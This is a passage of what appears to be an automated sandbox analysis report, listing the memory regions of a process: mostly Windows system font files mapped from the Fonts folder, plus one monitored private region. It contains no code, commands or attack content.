start_va = 0x8b0000
end_va = 0x8e4fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "aparajb.ttf"
filename = "\\Windows\\Fonts\\aparajb.ttf" (normalized: "c:\\windows\\fonts\\aparajb.ttf")
Region:
id = 614
start_va = 0x8b0000
end_va = 0x8e7fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "aparajbi.ttf"
filename = "\\Windows\\Fonts\\aparajbi.ttf" (normalized: "c:\\windows\\fonts\\aparajbi.ttf")
Region:
id = 615
start_va = 0x8b0000
end_va = 0x8e7fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "aparajbi.ttf"
filename = "\\Windows\\Fonts\\aparajbi.ttf" (normalized: "c:\\windows\\fonts\\aparajbi.ttf")
Region:
id = 616
start_va = 0x8b0000
end_va = 0x8eafff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "aparaji.ttf"
filename = "\\Windows\\Fonts\\aparaji.ttf" (normalized: "c:\\windows\\fonts\\aparaji.ttf")
Region:
id = 617
start_va = 0x8b0000
end_va = 0x8eafff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "aparaji.ttf"
filename = "\\Windows\\Fonts\\aparaji.ttf" (normalized: "c:\\windows\\fonts\\aparaji.ttf")
Region:
id = 618
start_va = 0x8b0000
end_va = 0x8cafff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "cordia.ttf"
filename = "\\Windows\\Fonts\\cordia.ttf" (normalized: "c:\\windows\\fonts\\cordia.ttf")
Region:
id = 619
start_va = 0x8b0000
end_va = 0x8cafff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "cordia.ttf"
filename = "\\Windows\\Fonts\\cordia.ttf" (normalized: "c:\\windows\\fonts\\cordia.ttf")
Region:
id = 620
start_va = 0x8b0000
end_va = 0x8c8fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "cordiai.ttf"
filename = "\\Windows\\Fonts\\cordiai.ttf" (normalized: "c:\\windows\\fonts\\cordiai.ttf")
Region:
id = 621
start_va = 0x8b0000
end_va = 0x8c8fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "cordiai.ttf"
filename = "\\Windows\\Fonts\\cordiai.ttf" (normalized: "c:\\windows\\fonts\\cordiai.ttf")
Region:
id = 622
start_va = 0x8b0000
end_va = 0x8c7fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "cordiab.ttf"
filename = "\\Windows\\Fonts\\cordiab.ttf" (normalized: "c:\\windows\\fonts\\cordiab.ttf")
Region:
id = 623
start_va = 0x8b0000
end_va = 0x8c7fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "cordiab.ttf"
filename = "\\Windows\\Fonts\\cordiab.ttf" (normalized: "c:\\windows\\fonts\\cordiab.ttf")
Region:
id = 624
start_va = 0x8b0000
end_va = 0x8c7fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "cordiaz.ttf"
filename = "\\Windows\\Fonts\\cordiaz.ttf" (normalized: "c:\\windows\\fonts\\cordiaz.ttf")
Region:
id = 625
start_va = 0x8b0000
end_va = 0x8c7fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "cordiaz.ttf"
filename = "\\Windows\\Fonts\\cordiaz.ttf" (normalized: "c:\\windows\\fonts\\cordiaz.ttf")
Region:
id = 626
start_va = 0x970000
end_va = 0x9bafff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "ebrima.ttf"
filename = "\\Windows\\Fonts\\ebrima.ttf" (normalized: "c:\\windows\\fonts\\ebrima.ttf")
Region:
id = 627
start_va = 0x970000
end_va = 0x9bafff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "ebrima.ttf"
filename = "\\Windows\\Fonts\\ebrima.ttf" (normalized: "c:\\windows\\fonts\\ebrima.ttf")
Region:
id = 628
start_va = 0x970000
end_va = 0x9b8fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "ebrimabd.ttf"
filename = "\\Windows\\Fonts\\ebrimabd.ttf" (normalized: "c:\\windows\\fonts\\ebrimabd.ttf")
Region:
id = 629
start_va = 0x970000
end_va = 0x9b8fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "ebrimabd.ttf"
filename = "\\Windows\\Fonts\\ebrimabd.ttf" (normalized: "c:\\windows\\fonts\\ebrimabd.ttf")
Region:
id = 630
start_va = 0x8b0000
end_va = 0x8c1fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "gisha.ttf"
filename = "\\Windows\\Fonts\\gisha.ttf" (normalized: "c:\\windows\\fonts\\gisha.ttf")
Region:
id = 631
start_va = 0x8b0000
end_va = 0x8c1fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "gisha.ttf"
filename = "\\Windows\\Fonts\\gisha.ttf" (normalized: "c:\\windows\\fonts\\gisha.ttf")
Region:
id = 632
start_va = 0x8b0000
end_va = 0x8c2fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "gishabd.ttf"
filename = "\\Windows\\Fonts\\gishabd.ttf" (normalized: "c:\\windows\\fonts\\gishabd.ttf")
Region:
id = 633
start_va = 0x8b0000
end_va = 0x8c2fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "gishabd.ttf"
filename = "\\Windows\\Fonts\\gishabd.ttf" (normalized: "c:\\windows\\fonts\\gishabd.ttf")
Region:
id = 634
start_va = 0x8b0000
end_va = 0x8e1fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "kokila.ttf"
filename = "\\Windows\\Fonts\\kokila.ttf" (normalized: "c:\\windows\\fonts\\kokila.ttf")
Region:
id = 635
start_va = 0x8b0000
end_va = 0x8e1fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "kokila.ttf"
filename = "\\Windows\\Fonts\\kokila.ttf" (normalized: "c:\\windows\\fonts\\kokila.ttf")
Region:
id = 636
start_va = 0x8b0000
end_va = 0x8e1fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "kokilab.ttf"
filename = "\\Windows\\Fonts\\kokilab.ttf" (normalized: "c:\\windows\\fonts\\kokilab.ttf")
Region:
id = 637
start_va = 0x8b0000
end_va = 0x8e1fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "kokilab.ttf"
filename = "\\Windows\\Fonts\\kokilab.ttf" (normalized: "c:\\windows\\fonts\\kokilab.ttf")
Region:
id = 638
start_va = 0x8b0000
end_va = 0x8e9fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "kokilabi.ttf"
filename = "\\Windows\\Fonts\\kokilabi.ttf" (normalized: "c:\\windows\\fonts\\kokilabi.ttf")
Region:
id = 639
start_va = 0x8b0000
end_va = 0x8e9fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "kokilabi.ttf"
filename = "\\Windows\\Fonts\\kokilabi.ttf" (normalized: "c:\\windows\\fonts\\kokilabi.ttf")
Region:
id = 640
start_va = 0x8b0000
end_va = 0x8ebfff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "kokilai.ttf"
filename = "\\Windows\\Fonts\\kokilai.ttf" (normalized: "c:\\windows\\fonts\\kokilai.ttf")
Region:
id = 641
start_va = 0x8b0000
end_va = 0x8ebfff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "kokilai.ttf"
filename = "\\Windows\\Fonts\\kokilai.ttf" (normalized: "c:\\windows\\fonts\\kokilai.ttf")
Region:
id = 642
start_va = 0x8b0000
end_va = 0x8c6fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "leelawad.ttf"
filename = "\\Windows\\Fonts\\leelawad.ttf" (normalized: "c:\\windows\\fonts\\leelawad.ttf")
Region:
id = 643
start_va = 0x8b0000
end_va = 0x8c6fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "leelawad.ttf"
filename = "\\Windows\\Fonts\\leelawad.ttf" (normalized: "c:\\windows\\fonts\\leelawad.ttf")
Region:
id = 644
start_va = 0x8b0000
end_va = 0x8c6fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "leelawdb.ttf"
filename = "\\Windows\\Fonts\\leelawdb.ttf" (normalized: "c:\\windows\\fonts\\leelawdb.ttf")
Region:
id = 645
start_va = 0x8b0000
end_va = 0x8c6fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "leelawdb.ttf"
filename = "\\Windows\\Fonts\\leelawdb.ttf" (normalized: "c:\\windows\\fonts\\leelawdb.ttf")
Region:
id = 646
start_va = 0x8b0000
end_va = 0x8e6fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "msuighur.ttf"
filename = "\\Windows\\Fonts\\msuighur.ttf" (normalized: "c:\\windows\\fonts\\msuighur.ttf")
Region:
id = 647
start_va = 0x8b0000
end_va = 0x8e6fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "msuighur.ttf"
filename = "\\Windows\\Fonts\\msuighur.ttf" (normalized: "c:\\windows\\fonts\\msuighur.ttf")
Region:
id = 648
start_va = 0x970000
end_va = 0x9c3fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "moolbor.ttf"
filename = "\\Windows\\Fonts\\moolbor.ttf" (normalized: "c:\\windows\\fonts\\moolbor.ttf")
Region:
id = 649
start_va = 0x970000
end_va = 0x9c3fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "moolbor.ttf"
filename = "\\Windows\\Fonts\\moolbor.ttf" (normalized: "c:\\windows\\fonts\\moolbor.ttf")
Region:
id = 650
start_va = 0x8b0000
end_va = 0x8c1fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "symbol.ttf"
filename = "\\Windows\\Fonts\\symbol.ttf" (normalized: "c:\\windows\\fonts\\symbol.ttf")
Region:
id = 651
start_va = 0x8b0000
end_va = 0x8c1fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "symbol.ttf"
filename = "\\Windows\\Fonts\\symbol.ttf" (normalized: "c:\\windows\\fonts\\symbol.ttf")
Region:
id = 652
start_va = 0x8b0000
end_va = 0x8e4fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "utsaah.ttf"
filename = "\\Windows\\Fonts\\utsaah.ttf" (normalized: "c:\\windows\\fonts\\utsaah.ttf")
Region:
id = 653
start_va = 0x8b0000
end_va = 0x8e4fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "utsaah.ttf"
filename = "\\Windows\\Fonts\\utsaah.ttf" (normalized: "c:\\windows\\fonts\\utsaah.ttf")
Region:
id = 654
start_va = 0x8b0000
end_va = 0x8e3fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "utsaahb.ttf"
filename = "\\Windows\\Fonts\\utsaahb.ttf" (normalized: "c:\\windows\\fonts\\utsaahb.ttf")
Region:
id = 655
start_va = 0x8b0000
end_va = 0x8e3fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "utsaahb.ttf"
filename = "\\Windows\\Fonts\\utsaahb.ttf" (normalized: "c:\\windows\\fonts\\utsaahb.ttf")
Region:
id = 656
start_va = 0x8b0000
end_va = 0x8e5fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "utsaahbi.ttf"
filename = "\\Windows\\Fonts\\utsaahbi.ttf" (normalized: "c:\\windows\\fonts\\utsaahbi.ttf")
Region:
id = 657
start_va = 0x8b0000
end_va = 0x8e5fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "utsaahbi.ttf"
filename = "\\Windows\\Fonts\\utsaahbi.ttf" (normalized: "c:\\windows\\fonts\\utsaahbi.ttf")
Region:
id = 658
start_va = 0x8b0000
end_va = 0x8eafff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "utsaahi.ttf"
filename = "\\Windows\\Fonts\\utsaahi.ttf" (normalized: "c:\\windows\\fonts\\utsaahi.ttf")
Region:
id = 659
start_va = 0x8b0000
end_va = 0x8eafff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "utsaahi.ttf"
filename = "\\Windows\\Fonts\\utsaahi.ttf" (normalized: "c:\\windows\\fonts\\utsaahi.ttf")
Region:
id = 660
start_va = 0x8b0000
end_va = 0x8d9fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "vijaya.ttf"
filename = "\\Windows\\Fonts\\vijaya.ttf" (normalized: "c:\\windows\\fonts\\vijaya.ttf")
Region:
id = 661
start_va = 0x8b0000
end_va = 0x8d9fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "vijaya.ttf"
filename = "\\Windows\\Fonts\\vijaya.ttf" (normalized: "c:\\windows\\fonts\\vijaya.ttf")
Region:
id = 662
start_va = 0x8b0000
end_va = 0x8d5fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "vijayab.ttf"
filename = "\\Windows\\Fonts\\vijayab.ttf" (normalized: "c:\\windows\\fonts\\vijayab.ttf")
Region:
id = 663
start_va = 0x8b0000
end_va = 0x8d5fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "vijayab.ttf"
filename = "\\Windows\\Fonts\\vijayab.ttf" (normalized: "c:\\windows\\fonts\\vijayab.ttf")
Region:
id = 664
start_va = 0x8b0000
end_va = 0x8c4fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "wingding.ttf"
filename = "\\Windows\\Fonts\\wingding.ttf" (normalized: "c:\\windows\\fonts\\wingding.ttf")
Region:
id = 665
start_va = 0x8b0000
end_va = 0x8c4fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "wingding.ttf"
filename = "\\Windows\\Fonts\\wingding.ttf" (normalized: "c:\\windows\\fonts\\wingding.ttf")
Region:
id = 666
start_va = 0x610000
end_va = 0x612fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "modern.fon"
filename = "\\Windows\\Fonts\\modern.fon" (normalized: "c:\\windows\\fonts\\modern.fon")
Region:
id = 667
start_va = 0x610000
end_va = 0x613fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "roman.fon"
filename = "\\Windows\\Fonts\\roman.fon" (normalized: "c:\\windows\\fonts\\roman.fon")
Region:
id = 668
start_va = 0x610000
end_va = 0x612fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "script.fon"
filename = "\\Windows\\Fonts\\script.fon" (normalized: "c:\\windows\\fonts\\script.fon")
Region:
id = 669
start_va = 0x8b0000
end_va = 0x8d6fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "andlso.ttf"
filename = "\\Windows\\Fonts\\andlso.ttf" (normalized: "c:\\windows\\fonts\\andlso.ttf")
Region:
id = 670
start_va = 0x8b0000
end_va = 0x8d6fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "andlso.ttf"
filename = "\\Windows\\Fonts\\andlso.ttf" (normalized: "c:\\windows\\fonts\\andlso.ttf")
Region:
id = 671
start_va = 0xee0000
end_va = 0xf78fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "arabtype.ttf"
filename = "\\Windows\\Fonts\\arabtype.ttf" (normalized: "c:\\windows\\fonts\\arabtype.ttf")
Region:
id = 672
start_va = 0xee0000
end_va = 0xf78fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "arabtype.ttf"
filename = "\\Windows\\Fonts\\arabtype.ttf" (normalized: "c:\\windows\\fonts\\arabtype.ttf")
Region:
id = 673
start_va = 0x8b0000
end_va = 0x8cefff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "simpo.ttf"
filename = "\\Windows\\Fonts\\simpo.ttf" (normalized: "c:\\windows\\fonts\\simpo.ttf")
Region:
id = 674
start_va = 0x8b0000
end_va = 0x8cefff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "simpo.ttf"
filename = "\\Windows\\Fonts\\simpo.ttf" (normalized: "c:\\windows\\fonts\\simpo.ttf")
Region:
id = 675
start_va = 0x8b0000
end_va = 0x8ccfff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "simpbdo.ttf"
filename = "\\Windows\\Fonts\\simpbdo.ttf" (normalized: "c:\\windows\\fonts\\simpbdo.ttf")
Region:
id = 676
start_va = 0x8b0000
end_va = 0x8ccfff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "simpbdo.ttf"
filename = "\\Windows\\Fonts\\simpbdo.ttf" (normalized: "c:\\windows\\fonts\\simpbdo.ttf")
Region:
id = 677
start_va = 0x8b0000
end_va = 0x8c9fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "simpfxo.ttf"
filename = "\\Windows\\Fonts\\simpfxo.ttf" (normalized: "c:\\windows\\fonts\\simpfxo.ttf")
Region:
id = 678
start_va = 0x8b0000
end_va = 0x8c9fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "simpfxo.ttf"
filename = "\\Windows\\Fonts\\simpfxo.ttf" (normalized: "c:\\windows\\fonts\\simpfxo.ttf")
Region:
id = 679
start_va = 0x970000
end_va = 0x9cafff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "majalla.ttf"
filename = "\\Windows\\Fonts\\majalla.ttf" (normalized: "c:\\windows\\fonts\\majalla.ttf")
Region:
id = 680
start_va = 0x970000
end_va = 0x9cafff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "majalla.ttf"
filename = "\\Windows\\Fonts\\majalla.ttf" (normalized: "c:\\windows\\fonts\\majalla.ttf")
Region:
id = 681
start_va = 0x970000
end_va = 0x9cbfff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "majallab.ttf"
filename = "\\Windows\\Fonts\\majallab.ttf" (normalized: "c:\\windows\\fonts\\majallab.ttf")
Region:
id = 682
start_va = 0x970000
end_va = 0x9cbfff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "majallab.ttf"
filename = "\\Windows\\Fonts\\majallab.ttf" (normalized: "c:\\windows\\fonts\\majallab.ttf")
Region:
id = 683
start_va = 0x8b0000
end_va = 0x8dbfff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "trado.ttf"
filename = "\\Windows\\Fonts\\trado.ttf" (normalized: "c:\\windows\\fonts\\trado.ttf")
Region:
id = 684
start_va = 0x8b0000
end_va = 0x8dbfff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "trado.ttf"
filename = "\\Windows\\Fonts\\trado.ttf" (normalized: "c:\\windows\\fonts\\trado.ttf")
Region:
id = 685
start_va = 0x8b0000
end_va = 0x8dafff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tradbdo.ttf"
filename = "\\Windows\\Fonts\\tradbdo.ttf" (normalized: "c:\\windows\\fonts\\tradbdo.ttf")
Region:
id = 686
start_va = 0x8b0000
end_va = 0x8dafff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tradbdo.ttf"
filename = "\\Windows\\Fonts\\tradbdo.ttf" (normalized: "c:\\windows\\fonts\\tradbdo.ttf")
Region:
id = 687
start_va = 0x610000
end_va = 0x61cfff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "ahronbd.ttf"
filename = "\\Windows\\Fonts\\ahronbd.ttf" (normalized: "c:\\windows\\fonts\\ahronbd.ttf")
Region:
id = 688
start_va = 0x610000
end_va = 0x61cfff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "ahronbd.ttf"
filename = "\\Windows\\Fonts\\ahronbd.ttf" (normalized: "c:\\windows\\fonts\\ahronbd.ttf")
Region:
id = 689
start_va = 0x610000
end_va = 0x61dfff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "david.ttf"
filename = "\\Windows\\Fonts\\david.ttf" (normalized: "c:\\windows\\fonts\\david.ttf")
Region:
id = 690
start_va = 0x610000
end_va = 0x61dfff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "david.ttf"
filename = "\\Windows\\Fonts\\david.ttf" (normalized: "c:\\windows\\fonts\\david.ttf")
Region:
id = 691
start_va = 0x610000
end_va = 0x61dfff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "davidbd.ttf"
filename = "\\Windows\\Fonts\\davidbd.ttf" (normalized: "c:\\windows\\fonts\\davidbd.ttf")
Region:
id = 692
start_va = 0x610000
end_va = 0x61dfff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "davidbd.ttf"
filename = "\\Windows\\Fonts\\davidbd.ttf" (normalized: "c:\\windows\\fonts\\davidbd.ttf")
Region:
id = 693
start_va = 0x610000
end_va = 0x61ffff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "frank.ttf"
filename = "\\Windows\\Fonts\\frank.ttf" (normalized: "c:\\windows\\fonts\\frank.ttf")
Region:
id = 694
start_va = 0x610000
end_va = 0x61ffff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "frank.ttf"
filename = "\\Windows\\Fonts\\frank.ttf" (normalized: "c:\\windows\\fonts\\frank.ttf")
Region:
id = 695
start_va = 0x610000
end_va = 0x61dfff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "lvnm.ttf"
filename = "\\Windows\\Fonts\\lvnm.ttf" (normalized: "c:\\windows\\fonts\\lvnm.ttf")
Region:
id = 696
start_va = 0x610000
end_va = 0x61dfff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "lvnm.ttf"
filename = "\\Windows\\Fonts\\lvnm.ttf" (normalized: "c:\\windows\\fonts\\lvnm.ttf")
Region:
id = 697
start_va = 0x610000
end_va = 0x61dfff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "lvnmbd.ttf"
filename = "\\Windows\\Fonts\\lvnmbd.ttf" (normalized: "c:\\windows\\fonts\\lvnmbd.ttf")
Region:
id = 698
start_va = 0x610000
end_va = 0x61dfff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "lvnmbd.ttf"
filename = "\\Windows\\Fonts\\lvnmbd.ttf" (normalized: "c:\\windows\\fonts\\lvnmbd.ttf")
Region:
id = 699
start_va = 0x610000
end_va = 0x61cfff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "mriam.ttf"
filename = "\\Windows\\Fonts\\mriam.ttf" (normalized: "c:\\windows\\fonts\\mriam.ttf")
Region:
id = 700
start_va = 0x610000
end_va = 0x61cfff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "mriam.ttf"
filename = "\\Windows\\Fonts\\mriam.ttf" (normalized: "c:\\windows\\fonts\\mriam.ttf")
Region:
id = 701
start_va = 0x610000
end_va = 0x61dfff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "mriamc.ttf"
filename = "\\Windows\\Fonts\\mriamc.ttf" (normalized: "c:\\windows\\fonts\\mriamc.ttf")
Region:
id = 702
start_va = 0x610000
end_va = 0x61dfff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "mriamc.ttf"
filename = "\\Windows\\Fonts\\mriamc.ttf" (normalized: "c:\\windows\\fonts\\mriamc.ttf")
Region:
id = 703
start_va = 0x610000
end_va = 0x61dfff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "nrkis.ttf"
filename = "\\Windows\\Fonts\\nrkis.ttf" (normalized: "c:\\windows\\fonts\\nrkis.ttf")
Region:
id = 704
start_va = 0x610000
end_va = 0x61dfff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "nrkis.ttf"
filename = "\\Windows\\Fonts\\nrkis.ttf" (normalized: "c:\\windows\\fonts\\nrkis.ttf")
Region:
id = 705
start_va = 0x610000
end_va = 0x61efff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "rod.ttf"
filename = "\\Windows\\Fonts\\rod.ttf" (normalized: "c:\\windows\\fonts\\rod.ttf")
Region:
id = 706
start_va = 0x610000
end_va = 0x61efff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "rod.ttf"
filename = "\\Windows\\Fonts\\rod.ttf" (normalized: "c:\\windows\\fonts\\rod.ttf")
Region:
id = 707
start_va = 0x4ff0000
end_va = 0x5a06fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "simfang.ttf"
filename = "\\Windows\\Fonts\\simfang.ttf" (normalized: "c:\\windows\\fonts\\simfang.ttf")
Region:
id = 708
start_va = 0x4ff0000
end_va = 0x5a06fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "simfang.ttf"
filename = "\\Windows\\Fonts\\simfang.ttf" (normalized: "c:\\windows\\fonts\\simfang.ttf")
Region:
id = 709
start_va = 0x4ff0000
end_va = 0x593cfff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "simhei.ttf"
filename = "\\Windows\\Fonts\\simhei.ttf" (normalized: "c:\\windows\\fonts\\simhei.ttf")
Region:
id = 710
start_va = 0x4ff0000
end_va = 0x593cfff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "simhei.ttf"
filename = "\\Windows\\Fonts\\simhei.ttf" (normalized: "c:\\windows\\fonts\\simhei.ttf")
Region:
id = 711
start_va = 0x6d80000
end_va = 0x7d4ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000006d80000"
filename = ""
Region:
id = 712
start_va = 0x4ff0000
end_va = 0x5b2dfff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "simkai.ttf"
filename = "\\Windows\\Fonts\\simkai.ttf" (normalized: "c:\\windows\\fonts\\simkai.ttf")
Region:
id = 713
start_va = 0x4ff0000
end_va = 0x5b2dfff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "simkai.ttf"
filename = "\\Windows\\Fonts\\simkai.ttf" (normalized: "c:\\windows\\fonts\\simkai.ttf")
Region:
id = 714
start_va = 0x8b0000
end_va = 0x8cafff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "angsau.ttf"
filename = "\\Windows\\Fonts\\angsau.ttf" (normalized: "c:\\windows\\fonts\\angsau.ttf")
Region:
id = 715
start_va = 0x8b0000
end_va = 0x8cafff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "angsau.ttf"
filename = "\\Windows\\Fonts\\angsau.ttf" (normalized: "c:\\windows\\fonts\\angsau.ttf")
Region:
id = 716
start_va = 0x8b0000
end_va = 0x8c9fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "angsaui.ttf"
filename = "\\Windows\\Fonts\\angsaui.ttf" (normalized: "c:\\windows\\fonts\\angsaui.ttf")
Region:
id = 717
start_va = 0x8b0000
end_va = 0x8c9fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "angsaui.ttf"
filename = "\\Windows\\Fonts\\angsaui.ttf" (normalized: "c:\\windows\\fonts\\angsaui.ttf")
Region:
id = 718
start_va = 0x8b0000
end_va = 0x8c9fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "angsaub.ttf"
filename = "\\Windows\\Fonts\\angsaub.ttf" (normalized: "c:\\windows\\fonts\\angsaub.ttf")
Region:
id = 719
start_va = 0x8b0000
end_va = 0x8c9fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "angsaub.ttf"
filename = "\\Windows\\Fonts\\angsaub.ttf" (normalized: "c:\\windows\\fonts\\angsaub.ttf")
Region:
id = 720
start_va = 0x8b0000
end_va = 0x8c9fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "angsauz.ttf"
filename = "\\Windows\\Fonts\\angsauz.ttf" (normalized: "c:\\windows\\fonts\\angsauz.ttf")
Region:
id = 721
start_va = 0x8b0000
end_va = 0x8c9fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "angsauz.ttf"
filename = "\\Windows\\Fonts\\angsauz.ttf" (normalized: "c:\\windows\\fonts\\angsauz.ttf")
Region:
id = 722
start_va = 0x8b0000
end_va = 0x8c5fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "browa.ttf"
filename = "\\Windows\\Fonts\\browa.ttf" (normalized: "c:\\windows\\fonts\\browa.ttf")
Region:
id = 723
start_va = 0x8b0000
end_va = 0x8c5fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "browa.ttf"
filename = "\\Windows\\Fonts\\browa.ttf" (normalized: "c:\\windows\\fonts\\browa.ttf")
Region:
id = 724
start_va = 0x8b0000
end_va = 0x8c8fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "browai.ttf"
filename = "\\Windows\\Fonts\\browai.ttf" (normalized: "c:\\windows\\fonts\\browai.ttf")
Region:
id = 725
start_va = 0x8b0000
end_va = 0x8c8fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "browai.ttf"
filename = "\\Windows\\Fonts\\browai.ttf" (normalized: "c:\\windows\\fonts\\browai.ttf")
Region:
id = 726
start_va = 0x8b0000
end_va = 0x8c2fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "browab.ttf"
filename = "\\Windows\\Fonts\\browab.ttf" (normalized: "c:\\windows\\fonts\\browab.ttf")
Region:
id = 727
start_va = 0x8b0000
end_va = 0x8c2fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "browab.ttf"
filename = "\\Windows\\Fonts\\browab.ttf" (normalized: "c:\\windows\\fonts\\browab.ttf")
Region:
id = 728
start_va = 0x8b0000
end_va = 0x8c5fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "browaz.ttf"
filename = "\\Windows\\Fonts\\browaz.ttf" (normalized: "c:\\windows\\fonts\\browaz.ttf")
Region:
id = 729
start_va = 0x8b0000
end_va = 0x8c5fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "browaz.ttf"
filename = "\\Windows\\Fonts\\browaz.ttf" (normalized: "c:\\windows\\fonts\\browaz.ttf")
Region:
id = 730
start_va = 0x8b0000
end_va = 0x8c5fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "browau.ttf"
filename = "\\Windows\\Fonts\\browau.ttf" (normalized: "c:\\windows\\fonts\\browau.ttf")
Region:
id = 731
start_va = 0x8b0000
end_va = 0x8c5fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
